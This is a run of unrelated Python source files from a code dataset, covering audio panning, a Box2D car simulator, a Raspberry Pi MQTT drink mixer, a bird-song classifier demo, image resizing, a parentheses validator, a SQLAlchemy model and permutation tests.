FADE_TIME].fade(to_gain=MIN_FADE_VOL, start=0,\n duration=SECONDS - FADE_TIME)\n faded_right += right[i + SECONDS - FADE_TIME:i + SECONDS] + MIN_FADE_VOL\n i += SECONDS\n faded_right += right[i:i + SECONDS - FADE_TIME].fade(from_gain=MIN_FADE_VOL, start=0,\n duration=SECONDS - FADE_TIME)\n faded_right += right[i + SECONDS - FADE_TIME:i + SECONDS]\n i += SECONDS\n\n eightD = AudioSegment.empty()\n pan = 0.9 * np.sin(np.linspace(0, 2 * np.pi, period))\n chunks = list(enumerate(audio[::100]))\n\n for i, chunk in tqdm(chunks, desc='Converting', unit='chunks', total=len(chunks)):\n if len(chunk) < 100:\n continue\n newChunk = chunk.pan(pan[i % period])\n eightD = eightD + newChunk\n\n final = faded_right.overlay(faded_left)\n final = final[:len(audio[:-SECONDS])]\n\n final.export(outputfile, format='mp3')\n\n\n# def tags(info):\n# ret = dict()\n# ret['title'] = info['title'][0]\n# ret['album'] = info['album'][0]\n# ret['artist'] = info['artist'][0]\n# ret['genre'] = info['genre'][0]\n# return ret\n\n\nif __name__ == '__main__':\n parser = ArgumentParser(description='Convert to 8D.')\n parser.add_argument('-i', type=str, required=True, help='input file')\n parser.add_argument('-o', type=str, default=parser.parse_args().i[:-4] + ' - 8D.mp3',\n help='output file (default: fileName - 8D.mp3)')\n parser.add_argument('-period', type=int, default=200, help='panning period (default: 200)')\n args = parser.parse_args()\n\n convert(args.i, args.o, args.period)\n","sub_path":"audio.py","file_name":"audio.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"324966702","text":"#odd nos\nl=[]\nn,q=map(int,input().split())\nfor i in range(n+1,q):\n if i%2==1:\n l.append(i)\nfor j in range(0,len(l)):\n if j==len(l)-1:\n print(l[j])\n else:\n print(l[j],end=\" \")\n","sub_path":"display_odd.py","file_name":"display_odd.py","file_ext":"py","file_size_in_byte":187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"583570668","text":"\"\"\" This file defines an environment for the Box2D PointMass simulator. \"\"\"\r\nimport numpy as np\r\nimport Box2D as b2\r\n\r\nfrom Box2D import (b2CircleShape, b2EdgeShape, b2FixtureDef, b2PolygonShape, b2_pi)\r\n# from Box2D import *\r\nfrom framework import Framework\r\n# from math import sqrt, cos, sin\r\nimport math\r\nfrom gps.agent.box2d.settings import fwSettings\r\nfrom gps.proto.gps_pb2 import END_EFFECTOR_POINTS, END_EFFECTOR_POINT_VELOCITIES\r\n\r\n\r\nclass TDGroundArea(object):\r\n \"\"\"\r\n An area on the ground that the car can run over\r\n \"\"\"\r\n\r\n def __init__(self, friction_modifier):\r\n self.friction_modifier = friction_modifier\r\n\r\n\r\nclass TDTire(object):\r\n\r\n def __init__(self, car, max_forward_speed=100.0,\r\n max_backward_speed=-20, max_drive_force=150,\r\n turn_torque=15, max_lateral_impulse=3,\r\n dimensions=(0.25, 0.6), density=1.0,\r\n position=(0, 0)):\r\n\r\n world = car.body.world\r\n\r\n self.current_traction = 1\r\n self.turn_torque = turn_torque\r\n self.max_forward_speed = max_forward_speed\r\n self.max_backward_speed = max_backward_speed\r\n self.max_drive_force = max_drive_force\r\n self.max_lateral_impulse = max_lateral_impulse\r\n self.ground_areas = []\r\n\r\n self.body = world.CreateDynamicBody(position=position)\r\n self.body.CreatePolygonFixture(box=dimensions, density=density)\r\n self.body.userData = {'obj': self}\r\n\r\n @property\r\n def forward_velocity(self):\r\n body = self.body\r\n current_normal = body.GetWorldVector((0, 1))\r\n return current_normal.dot(body.linearVelocity) * current_normal\r\n\r\n @property\r\n def lateral_velocity(self):\r\n body = self.body\r\n\r\n right_normal = body.GetWorldVector((1, 0))\r\n return right_normal.dot(body.linearVelocity) * right_normal\r\n\r\n def update_friction(self):\r\n impulse = -self.lateral_velocity * self.body.mass\r\n if impulse.length > self.max_lateral_impulse:\r\n impulse *= self.max_lateral_impulse / impulse.length\r\n\r\n self.body.ApplyLinearImpulse(self.current_traction * impulse,\r\n self.body.worldCenter, True)\r\n\r\n aimp = 0.1 * self.current_traction * \\\r\n self.body.inertia * -self.body.angularVelocity\r\n self.body.ApplyAngularImpulse(aimp, True)\r\n\r\n current_forward_normal = self.forward_velocity\r\n current_forward_speed = current_forward_normal.Normalize()\r\n\r\n drag_force_magnitude = -2 * current_forward_speed\r\n self.body.ApplyForce(self.current_traction * drag_force_magnitude * current_forward_normal,\r\n self.body.worldCenter, True)\r\n\r\n def update_drive(self, speed):\r\n # if 'up' in keys:\r\n # desired_speed = self.max_forward_speed\r\n # elif 'down' in keys:\r\n # desired_speed = self.max_backward_speed\r\n # else:\r\n # return\r\n\r\n desired_speed = speed\r\n\r\n # find the current speed in the forward direction\r\n current_forward_normal = self.body.GetWorldVector((0, 1))\r\n current_speed = self.forward_velocity.dot(current_forward_normal)\r\n\r\n # apply necessary force\r\n force = 0.0\r\n if desired_speed > current_speed:\r\n force = self.max_drive_force\r\n elif desired_speed < current_speed:\r\n force = -self.max_drive_force\r\n else:\r\n return\r\n\r\n self.body.ApplyForce(self.current_traction * force * current_forward_normal,\r\n self.body.worldCenter, True)\r\n\r\n def update_turn(self, keys):\r\n if 'left' in keys:\r\n desired_torque = self.turn_torque\r\n elif 'right' in keys:\r\n desired_torque = -self.turn_torque\r\n else:\r\n return\r\n\r\n self.body.ApplyTorque(desired_torque, True)\r\n\r\n def add_ground_area(self, ud):\r\n if ud not in self.ground_areas:\r\n self.ground_areas.append(ud)\r\n self.update_traction()\r\n\r\n def remove_ground_area(self, ud):\r\n if ud in self.ground_areas:\r\n self.ground_areas.remove(ud)\r\n self.update_traction()\r\n\r\n def update_traction(self):\r\n if not self.ground_areas:\r\n self.current_traction = 1\r\n else:\r\n self.current_traction = 0\r\n mods = [ga.friction_modifier for ga in self.ground_areas]\r\n\r\n max_mod = max(mods)\r\n if max_mod > self.current_traction:\r\n self.current_traction = max_mod\r\n\r\n\r\nclass TDCar(object):\r\n vertices = [(0.75, 0.0),\r\n (1.5, 1.25),\r\n (1.4, 2.75),\r\n (0.5, 5.0),\r\n (-0.5, 5.0),\r\n (-1.4, 2.75),\r\n (-1.5, 1.25),\r\n (-0.75, 0.0),\r\n ]\r\n\r\n tire_anchors = [(-1.5, 0.37),\r\n (1.5, 0.37),\r\n (-1.5, 4.25),\r\n (1.5, 4.25),\r\n ]\r\n\r\n def __init__(self, world, vertices=None,\r\n tire_anchors=None, density=0.1, position=(0, 0), angle=0,\r\n **tire_kws):\r\n if vertices is None:\r\n vertices = TDCar.vertices\r\n\r\n self.world = world\r\n self.body = world.CreateDynamicBody(position=position)\r\n self.body.CreatePolygonFixture(vertices=vertices, density=density)\r\n self.body.userData = {'obj': self}\r\n self.body.angle = angle\r\n\r\n # self.position = position\r\n # self.linearVelocity = self.body.linearVelocity\r\n\r\n self.tires = [TDTire(self, **tire_kws) for i in range(4)]\r\n\r\n if tire_anchors is None:\r\n anchors = TDCar.tire_anchors\r\n\r\n joints = self.joints = []\r\n for tire, anchor in zip(self.tires, anchors):\r\n j = world.CreateRevoluteJoint(bodyA=self.body,\r\n bodyB=tire.body,\r\n localAnchorA=anchor,\r\n # center of tire\r\n localAnchorB=(0, 0),\r\n enableMotor=False,\r\n maxMotorTorque=1000,\r\n enableLimit=True,\r\n lowerAngle=0,\r\n upperAngle=0,\r\n )\r\n\r\n tire.body.position = self.body.worldCenter + anchor\r\n joints.append(j)\r\n\r\n def update(self, angle, speed, hz):\r\n for tire in self.tires:\r\n tire.update_friction()\r\n\r\n for tire in self.tires:\r\n tire.update_drive(speed)\r\n\r\n # control steering\r\n lock_angle = math.radians(40.)\r\n # from lock to lock in 0.5 sec\r\n turn_speed_per_sec = math.radians(160.)\r\n turn_per_timestep = turn_speed_per_sec / hz\r\n desired_angle = 0.0\r\n\r\n if angle > lock_angle:\r\n angle = lock_angle\r\n\r\n if angle < -lock_angle:\r\n angle = -lock_angle\r\n\r\n desired_angle = angle\r\n\r\n front_left_joint, front_right_joint = self.joints[2:4]\r\n angle_now = front_left_joint.angle\r\n angle_to_turn = desired_angle - angle_now\r\n\r\n # TODO fix b2Clamp for non-b2Vec2 types\r\n if angle_to_turn < -turn_per_timestep:\r\n angle_to_turn = -turn_per_timestep\r\n elif angle_to_turn > turn_per_timestep:\r\n angle_to_turn = turn_per_timestep\r\n\r\n new_angle = angle_now + angle_to_turn\r\n # Rotate the tires by locking the limits:\r\n front_left_joint.SetLimits(new_angle, new_angle)\r\n front_right_joint.SetLimits(new_angle, new_angle)\r\n\r\n def destroy(self):\r\n for tire in self.tires:\r\n self.world.DestroyBody(tire.body)\r\n tire = None\r\n\r\n self.world.DestroyBody(self.body)\r\n\r\nclass CarWorld(Framework):\r\n name = \"Car\"\r\n\r\n def __init__(self, x0, target, render):\r\n self.render = render\r\n if self.render:\r\n super(CarWorld, self).__init__()\r\n else:\r\n self.world = b2.b2World(gravity=(0, 0), doSleep=True)\r\n\r\n self.world.gravity = (0.0, 0.0)\r\n self.initial_position = (x0[0], x0[1])\r\n self.initial_angle = 0\r\n\r\n ground = self.world.CreateBody(position=(0, 20))\r\n ground.CreateEdgeChain(\r\n [(-10, -30),\r\n (-10, 5),\r\n (-30, 30),]\r\n )\r\n\t \r\n ground.CreateEdgeChain(\r\n [(10, -30),\r\n (10, 5),\r\n (-10, 30),]\r\n )\r\n\t \r\n xf1 = b2.b2Transform()\r\n xf1.angle = 0.3524 * b2.b2_pi\r\n xf1.position = b2.b2Mul(xf1.R, (1.0, 0.0))\r\n\r\n xf2 = b2.b2Transform()\r\n xf2.angle = -0.3524 * b2.b2_pi\r\n xf2.position = b2.b2Mul(xf2.R, (-1.0, 0.0))\r\n\r\n self.car = TDCar(self.world, position=self.initial_position, angle=self.initial_angle)\r\n\r\n self.target = self.world.CreateStaticBody(\r\n position=target[:2],\r\n angle=self.initial_angle,\r\n shapes=[b2.b2PolygonShape(vertices=[xf1*(-1, 0), xf1*(1, 0),\r\n xf1*(0, .5)]),\r\n b2.b2PolygonShape(vertices=[xf2*(-1, 0), xf2*(1, 0),\r\n xf2*(0, .5)])],\r\n )\r\n self.target.active = False\r\n\r\n\r\n self.start = self.world.CreateStaticBody(\r\n position=self.initial_position,\r\n angle=self.initial_angle,\r\n shapes=[b2.b2PolygonShape(vertices=[xf1*(-1, 0), xf1*(1, 0),\r\n xf1*(0, .5)]),\r\n b2.b2PolygonShape(vertices=[xf2*(-1, 0), xf2*(1, 0),\r\n xf2*(0, .5)])],\r\n )\r\n self.start.active = False\r\n\r\n def run(self):\r\n \"\"\"Initiates the first time step\r\n \"\"\"\r\n if self.render:\r\n super(CarWorld, self).run()\r\n else:\r\n self.run_next(None)\r\n\r\n def run_next(self, action):\r\n \"\"\"Moves forward in time one step. Calls the renderer if applicable.\"\"\"\r\n if self.render:\r\n super(CarWorld, self).run_next(action)\r\n else:\r\n if action is not None:\r\n self.car.update(action[1], action[0], fwSettings.hz)\r\n self.world.Step(1.0 / fwSettings.hz, fwSettings.velocityIterations,\r\n fwSettings.positionIterations)\r\n\r\n def Step(self, settings, action):\r\n \"\"\"Called upon every step. \"\"\"\r\n self.car.update(action[1], action[0], 60)\r\n # self.car.body.linearVelocity = (action[0], action[1])\r\n # print self.car.position\r\n super(CarWorld, self).Step(settings)\r\n\r\n def reset_world(self):\r\n \"\"\" This resets the world to its initial state\"\"\"\r\n self.world.ClearForces()\r\n self.car.body.position = self.initial_position\r\n self.car.body.angle = self.initial_angle\r\n\r\n # self.car.update(0, 0, 60)\r\n\r\n # print self.car.body.position\r\n\r\n self.car.destroy()\r\n self.car = TDCar(self.world, position=self.initial_position, angle=self.initial_angle)\r\n\r\n # self.car.body.angularVelocity = self.initial_angular_velocity\r\n # self.car.body.linearVelocity = self.initial_linear_velocity\r\n\r\n def get_state(self):\r\n \"\"\" This retrieves the state of the point mass\"\"\"\r\n state = {END_EFFECTOR_POINTS: np.append(np.array(self.car.body.position), [0]),\r\n END_EFFECTOR_POINT_VELOCITIES: np.append(np.array(self.car.body.linearVelocity), [0])}\r\n\r\n return state\r\n","sub_path":"python/gps/agent/box2d/car_world.py","file_name":"car_world.py","file_ext":"py","file_size_in_byte":11777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"95697946","text":"\"\"\"\r\n---------------------------- MIMOSA machine ----------------------------\r\nRun the machine through Raspberry GPIO ports and control it with Ikea Trådfri remote controller via MQTT server \r\n\"\"\"\r\n\r\nimport paho.mqtt.client as mqtt\r\nimport os\r\nimport time\r\nimport json\r\nimport RPi.GPIO as GPIO\r\n\r\nConnected = False #global variable for the state of the connection\r\nRATIO = 5 # global variable for alcohol ratio (scale 0 - 10)\r\n\r\nbroker_address = \"localhost\"\r\nport = 1883\r\nuser = \"pi\"\r\n#password = \"raspberry\"\r\n\r\nGPIO.setmode(GPIO.BCM)\r\n\r\n# pins dict\r\npins = {\r\n #23: {\"name\": \"GPIO 23\", \"state\": GPIO.LOW},\r\n \"air_pump\": {\"pin\": 21, \"name\": \"GPIO 29\", \"default_state\": GPIO.LOW},\r\n \"alc\": {\"pin\": 20, \"name\": \"GPIO 28\", \"default_state\": GPIO.LOW},\r\n \"mixer\": {\"pin\": 16, \"name\": \"GPIO 27\", \"default_state\": GPIO.LOW},\r\n}\r\n\r\ndef reset_pins():\r\n \"\"\"Reset pins\"\"\"\r\n print(\"resetting pins\")\r\n for pin_name, pin_info in pins.items():\r\n pin = pin_info[\"pin\"]\r\n GPIO.setup(pin, GPIO.OUT)\r\n GPIO.output(pin, pin_info[\"default_state\"])\r\n\r\n# The callback for when the client receives a CONNACK response from the server.\r\ndef on_connect(self, userdata, flags, rc):\r\n if rc == 0:\r\n print(\"Connected to broker\")\r\n global Connected #Use global variable\r\n Connected = True #Signal connection \r\n else:\r\n print(\"Connection failed\")\r\n\r\n# The callback for when a PUBLISH message is received from the server.\r\ndef listener(self, userdata, msg):\r\n try:\r\n message = json.loads(msg.payload)\r\n # Make_drink\r\n if(message['action'] == \"toggle\"):\r\n make_drink(self)\r\n print(\"pushing toggle (make a drink)\")\r\n # Decrease alc_level\r\n elif(message['action'] == \"brightness_down_click\"):\r\n alc_ratio(self, 0)\r\n print(\"pushing brightness_down_click (alc_ratio decrease)\")\r\n # Increase alc_level\r\n elif(message['action'] == \"brightness_up_click\"):\r\n alc_ratio(self, 1)\r\n print(\"pushing brightness_up_click (alc_ratio increase)\")\r\n # Reset alc_level\r\n elif(message['action'] == \"arrow_left_click\" or message['action'] == \"arrow_right_click\"):\r\n alc_ratio(self, 2)\r\n print(\"pushing arrow_left_click (reset)\")\r\n else:\r\n print(\"unknown button signal\")\r\n except Exception as e:\r\n print(\"Exception: \" + e)\r\n\r\ndef make_drink(self):\r\n \"\"\"Make a drink\"\"\"\r\n # pump on = red led on\r\n reset_pins()\r\n\r\n print(\"The pump is ON\")\r\n GPIO.output(pins[\"air_pump\"][\"pin\"], GPIO.HIGH)\r\n time.sleep(1)\r\n # alcohol = yellow led on\r\n GPIO.output(pins[\"alc\"][\"pin\"], GPIO.HIGH)\r\n print(\"Alcohol valve is open\")\r\n time.sleep(RATIO)\r\n GPIO.output(pins[\"alc\"][\"pin\"], GPIO.LOW)\r\n print(\"Alcohol valve is closed\")\r\n \r\n # mixer = green led on\r\n GPIO.output(pins[\"mixer\"][\"pin\"], GPIO.HIGH)\r\n print(\"Mixer valve is open\")\r\n # fix this hardcoded 10\r\n time.sleep(10 - RATIO)\r\n GPIO.output(pins[\"mixer\"][\"pin\"], GPIO.LOW)\r\n print(\"Mixer valve is closed\")\r\n\r\n #pump off\r\n GPIO.output(pins[\"air_pump\"][\"pin\"], GPIO.LOW)\r\n print(\"Pump off\")\r\n sender(self, 1) # drink done\r\n\r\n# Create and publish message to the server\r\ndef sender(self, action, brightness=254):\r\n if action == 1: # Drink done, flash the lamp\r\n self.publish(\"zigbee2mqtt/IKEA_LAMP/set\", create_payload(\"TOGGLE\"))\r\n time.sleep(2)\r\n self.publish(\"zigbee2mqtt/IKEA_LAMP/set\", create_payload(\"TOGGLE\"))\r\n elif action == 2: # Adjust the brightness of the lamp\r\n self.publish(\"zigbee2mqtt/IKEA_LAMP/set\", create_payload(\"ON\", brightness))\r\n else:\r\n print(\"Cannot publish message, unkown action\")\r\n \r\ndef create_payload(lamp_state, brightness_value=254):\r\n # Lamp_state \"TOGGLE\" runs only without brightness value)\r\n if lamp_state == \"TOGGLE\":\r\n payload = '{\"state\":\"TOGGLE\"}'\r\n else:\r\n payload = '{\"state\":\"' + str(lamp_state) + '\", \"brightness\":\"' + str(brightness_value) + '\"}'\r\n return payload\r\n\r\ndef alc_ratio(self, ratio_action):\r\n \"\"\"Set alcohol ratio\"\"\"\r\n global RATIO\r\n #brightness ratio * 25 needs to be tweaked\r\n if ratio_action == 1:\r\n if RATIO < 10:\r\n RATIO += 1\r\n elif ratio_action == 0:\r\n if RATIO > 0:\r\n RATIO -= 1\r\n elif ratio_action == 2:\r\n RATIO = 5\r\n sender(self, 2, RATIO * 25)\r\n\r\ndef on_publish(self, userdata, msg):\r\n print(\"data published \\n\")\r\n\r\ndef main():\r\n client = mqtt.Client()\r\n client.username_pw_set(user, password=None)\r\n client.on_connect = on_connect # Create connection to the server\r\n client.on_message = listener # Open received message from the server\r\n client.on_publish = on_publish # Get acknowledgement that publishment has done\r\n\r\n client.connect(broker_address, port = port)\r\n client.loop_start()\r\n client.subscribe([(\"zigbee2mqtt/IKEA_SWITCH\", 0), (\"zigbee2mqtt/IKEA_LAMP\", 0)]) # Params: topic name and qos level\r\n\r\n while Connected != True: # Poll the server until the connection is established\r\n time.sleep(0.1)\r\n\r\n try:\r\n while True: # Keep the script running until interrupted\r\n time.sleep(1)\r\n except KeyboardInterrupt:\r\n print(\"exiting\")\r\n client.disconnect()\r\n client.loop_stop()\r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"156595464","text":"import matplotlib.pyplot as mp\nimport numpy as np\nimport pickle\nimport sys\nimport csv\n\nfrom signalproc import AudioSignal\n\ndef read_real_classes(file_name, birds):\n result = {}\n with open(file_name, \"r\") as file:\n reader = csv.reader(file)\n for row in reader:\n result[int(row[0])] = [birds[i] for i, e in enumerate(row[1:]) if int(e) > 0]\n\n result[-1] = \"Not found real data\"\n return result\n\ndef read_classes(file_name):\n with open(file_name, \"r\") as f:\n return f.readlines()\n\ndef restore_classificator(file_name):\n with open(file_name, \"rb\") as f:\n return pickle.load(f)\n\ndef plot(audio, x):\n mp.subplot(2, 1, 1)\n mp.specgram(audio.samples, NFFT=1024, Fs=audio.framerate, noverlap=900)\n mp.title(\"Spectrogram\")\n mp.subplot(2, 1, 2)\n mp.plot(x)\n mp.title(\"MSMS\")\n mp.show()\n\ndef get_test_number(file_name):\n try:\n if len(file_name) < len(\"nips4b_birds_trainfile000\"):\n raise ValueError\n return int(file_name[-7:-4])\n except ValueError:\n return -1\n\nprint(sys.argv[1])\nbirds = read_classes(\"birds.csv\")\nreal = read_real_classes(\"real.csv\", birds)\nclf = restore_classificator(\"classificator.pyobj\")\n\naudio = AudioSignal(sys.argv[1])\nc = audio.mel_spectra()\n\nplot(audio, c)\n\npredicted = clf.predict_proba(c)[0]\npb = [(predicted[x], birds[x]) for x in range(len(birds)-1)]\npb = sorted(pb, key=lambda x:x[0], reverse=True)[0:7]\npb = [\"{0:0.2}\".format(x[0]) + \" - \" + str(x[1]) for x in pb]\n\nprint(\"Predicted:\")\nprint(\"Probability - Class, Name\")\nfor i in pb:\n print(i, end=\"\")\n\nreal_number = get_test_number(sys.argv[1])\nprint(\"\\nReal:\")\nfor i in real[real_number]:\n print(i, end=\"\")\nprint(\"\")\n","sub_path":"Demo/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"414156288","text":"import cv2\nimport numpy as np\n\n# Show original image\nimage = cv2.imread(\"jurassic-park-tour-jeep.jpg\")\ncv2.imshow(\"original\", image)\ncv2.waitKey(0)\ncv2.destroyWindow(\"original\")\n\n# Shrink or expand image\nratio = 100.0/image.shape[1]\nnew_dim = (100, int(image.shape[0]*ratio))\n\nresized = cv2.resize(image, new_dim, interpolation = cv2.INTER_AREA)\ncv2.imshow(\"resized\", resized)\ncv2.waitKey(0)\ncv2.destroyWindow(\"resized\")","sub_path":"shrink_resize.py","file_name":"shrink_resize.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"562781345","text":"class Solution(object):\n def isValid(self, s):\n \"\"\"\n :type s: str\n :rtype: bool\n \"\"\"\n stack = []\n p_dict = {\n ']' : '[',\n ')' : '(',\n '}' : '{'\n }\n for e in s:\n if e in p_dict.values():\n stack.append(e)\n elif e in p_dict.keys():\n if not stack or stack.pop() != p_dict[e]:\n return False\n else:\n return False\n return not stack\n\n # this is a more intuitive solution [EASY]\n def isValid_alt1(self, s):\n \"\"\"\n :type s: str\n :rtype: bool\n \"\"\"\n stack = []\n for e in s:\n if e == '[' or e == '{' or e == '(':\n stack.append(e)\n elif not stack:\n return False\n elif e == ']' and stack.pop() != '[':\n return False\n elif e == '}' and stack.pop() != '{':\n return False\n elif e == ')' and stack.pop() != '(':\n return False\n return not stack\n\n # this is an alternative solution with a trick [EASY]\n def isValid_alt2(self, s):\n if not s:\n return True\n if len(s) % 2 != 0:\n return False\n while '()' in s or '[]' in s or '{}' in s:\n s = s.replace('()', '').replace(\"[]\", '').replace('{}', '')\n return not s","sub_path":"python/020_Valid_Parentheses.py","file_name":"020_Valid_Parentheses.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"639502559","text":"__author__ = 'mwagner'\n\nfrom sqlalchemy import ForeignKey, Column, String, Integer, Numeric\nfrom CtFineForTaxPayment import *\nfrom ClPaymentFrequency import *\nfrom CtTaxAndPricePayment import *\n\n\nclass CtTaxAndPrice(Base):\n\n __tablename__ = 'ct_tax_and_price'\n\n record = Column(String, ForeignKey('ct_ownership_record.record_no'), primary_key=True)\n person = Column(String, ForeignKey('bs_person.person_id'), primary_key=True)\n share = Column(Numeric)\n area = Column(Integer)\n value_calculated = Column(Integer)\n price_paid = Column(Integer)\n land_tax = Column(Integer)\n grace_period = Column(Integer)\n base_value_per_m2 = Column(Integer)\n base_tax_rate = Column(Numeric)\n subsidized_area = Column(Integer)\n subsidized_tax_rate = Column(Numeric)\n\n # foreign keys:\n payment_frequency = Column(Integer, ForeignKey('cl_payment_frequency.code'))\n payment_frequency_ref = relationship(\"ClPaymentFrequency\")\n\n payments = relationship(\"CtTaxAndPricePayment\", backref='tax_ref', lazy='dynamic', cascade=\"all, delete, delete-orphan\")\n fine_payments = relationship(\"CtFineForTaxPayment\", backref='tax_ref', lazy='dynamic', cascade=\"all, delete, delete-orphan\")","sub_path":"model/CtTaxAndPrice.py","file_name":"CtTaxAndPrice.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"590255790","text":"import numpy as np\n\nBLOCK_SIZE = 4096\nII = np.iinfo(np.int32)\n\nDEVICES = {\n 'FLOW 8 (Recording)': {\n '1-2': slice(0, 2),\n '3-4': slice(2, 4),\n '5-6': slice(4, 6),\n '7-8': slice(6, 8),\n 'Main': slice(8, 10)\n },\n 'MacBook Pro Microphone': {\n '1': slice(0, 1)\n },\n 'USB PnP Sound Device': {\n '1': slice(0, 1)\n },\n 'ZoomAudioDevice': {\n '1-2': slice(0, 2)\n },\n}\n\n\ndef emit_blocks():\n rng = np.random.default_rng(23)\n\n while True:\n for device_name, device in DEVICES.items():\n for channel_name, sl in device.items():\n count = sl.stop - sl.start\n frame = rng.integers(II.min, II.max, (count, BLOCK_SIZE))\n\n yield frame, channel_name, device_name\n","sub_path":"test/mock_data.py","file_name":"mock_data.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"168917887","text":"#!/usr/bin/env python\n#\n# Copyright 2009 Sebastian Raaphorst.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Unit testing for the permtj module.\n\nBy Sebastian Raaphorst, 2009.\"\"\"\n\nimport unittest\nfrom functools import reduce\n\nfrom . import permtj\nfrom . import combfuncs\n\nclass Tester(unittest.TestCase):\n \"\"\"Unit testing class for this module.\n We perform all operations and check their interactions for correctness.\"\"\"\n\n def setUp(self):\n self.n = 5\n\n def testall(self):\n \"\"\"Test the interactions between all functions.\"\"\"\n\n # We iterate over all permutations, and check their rank to make sure\n # it is as expected. Unrank the rank and make sure the unranked\n # permutation corresponds to what we have. This does not test succ\n # explicitly, but as this is called by all, it is implicitly tested.\n rk = 0\n for P in permtj.all(self.n):\n # Check to make sure that the rank of K is rk.\n self.assertEqual(permtj.rank(self.n, P), rk)\n\n # Check to make sure that unranking rk gives K.\n self.assertEqual(permtj.unrank(self.n, rk), P)\n\n # Increment the rank.\n rk += 1\n\n # Make sure that we saw the correct number of permutations, namely n!\n self.assertEqual(rk, reduce(lambda x,y:x*y, range(1,self.n+1), 1))\n\n\nif __name__ == '__main__':\n unittest.main()\n\n","sub_path":"pyncomb/permtjtest.py","file_name":"permtjtest.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"272219852","text":"import argparse\nimport csv\nfrom random import randint \n\n\n\t\n\t\ndef Apply_the_process_A_to_B(subject_list):\n\tsubject_dict = {1: Key_Accounting_list, 2: Key_Computer_Science_list, \\\n 3: Key_Information_Management_list, 4: Key_Physics_list,\\\n 5: Key_Political_Science_list, 6: Key_Properties_list,\\\n 7: Key_Banking_Finance_Insurance_list, 8: Key_Management_Science_list, \\\n 9: Key_Military_list, 10: Key_Religions_list}\n\n\tsubject_department_dict = {1: 'Accounting', 2: 'Computer Science', \\\n 3: 'Information Management', 4: 'Physics',\\\n 5: 'Political Science', 6: 'Properties',\\\n 7: 'Banking, Finance, Insurance', 8: 'Management Science', \n 9: 'Military', 10: 'Religions'}\n\ttopics = [];\n\t#for i in range(0, len(subject_list)):\n\tfor i in range(1, len(subject_list)):\n\t\trandom_index = randint(0, len(subject_dict[int(subject_list[i])]))\n\t\ttmp_list = subject_dict[int(subject_list[i])]\n\t\ttopics.append(tmp_list[random_index][0])\n\treturn topics\n\n#def Apply_the_concept_A_to_B(subject_list):\n#\ttopics=[]\n# for i in range(0, len(subject_list)):\n# random_index = randint(0, len(subject_dict[subject_list[i]]))\n# tmp_list = subject_dict[subject_list[i]]\n# topics.append(tmp_list[random_index][0])\n# return topics\n#\n#def Any_common_things_among(subject_list):\n# topics=[]\n# for i in range(0, len(subject_list)):\n# random_index = randint(0, len(subject_dict[subject_list[i]]))\n# tmp_list = subject_dict[subject_list[i]]\n# topics.append(tmp_list[random_index][0])\n# return topics\n#\n#\t\n#def Any_different_things_among(subject_list):\n# topics=[]\n# for i in range(0, len(subject_list)):\n# random_index = randint(0, len(subject_dict[subject_list[i]]))\n# tmp_list = subject_dict[subject_list[i]]\n# topics.append(tmp_list[random_index][0])\n# return topics\n#\n#def Combining_these_things_to_invent(subject_list):\n# topics=[]\n# for i in range(0, len(subject_list)):\n# random_index = randint(0, len(subject_dict[subject_list[i]]))\n# tmp_list = subject_dict[subject_list[i]]\n# topics.append(tmp_list[random_index][0])\n# return topics\n#\n#def Can_we_improve(subject_list):\n# topics=[]\n# for i in range(0, len(subject_list)):\n# random_index = randint(0, len(subject_dict[subject_list[i]]))\n# tmp_list = subject_dict[subject_list[i]]\n# topics.append(tmp_list[random_index][0])\n# return topics\t\n#\t\n#def If_there_is_no(subject_list):\n# topics=[]\n# for i in range(0, len(subject_list)):\n# random_index = randint(0, len(subject_dict[subject_list[i]]))\n# tmp_list = subject_dict[subject_list[i]]\n# topics.append(tmp_list[random_index][0])\n# return topics\n#\nif __name__ == '__main__':\n\t#print('hello');\n\tsubject_department_dict_for_main = {1: 'Accounting', 2: 'Computer Science', \\\n 3: 'Information Management', 4: 'Physics',\\\n 5: 'Political Science', 6: 'Properties',\\\n 7: 'Banking, Finance, Insurance', 8: 'Management Science', \n 9: 'Military', 10: 'Religions'}\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"arguments\", nargs=\"+\", help=\"Available previously generated models. First one will be used by MCTS, and the others to compare the final team composition.\")\n\targs = parser.parse_args()\n\tsub_dept_dict = {1: 'Accounting', 2: 'Computer Science', \\\n 3: 'Information Management', 4: 'Physics',\\\n 5: 'Political Science', 6: 'Properties',\\\n 7: 'Banking, Finance, Insurance', 8: 'Management Science', \n 9: 'Military', 10: 'Religions'}\n\tsub_reverse_keys = {'Accounting': '1', 'Computer Science': '2', \\\n 'Information Management': '3', 'Physics': '4',\\\n 'Political Science': '5', 'Properties': '6',\\\n 'Banking, Finance, Insurance': '7', 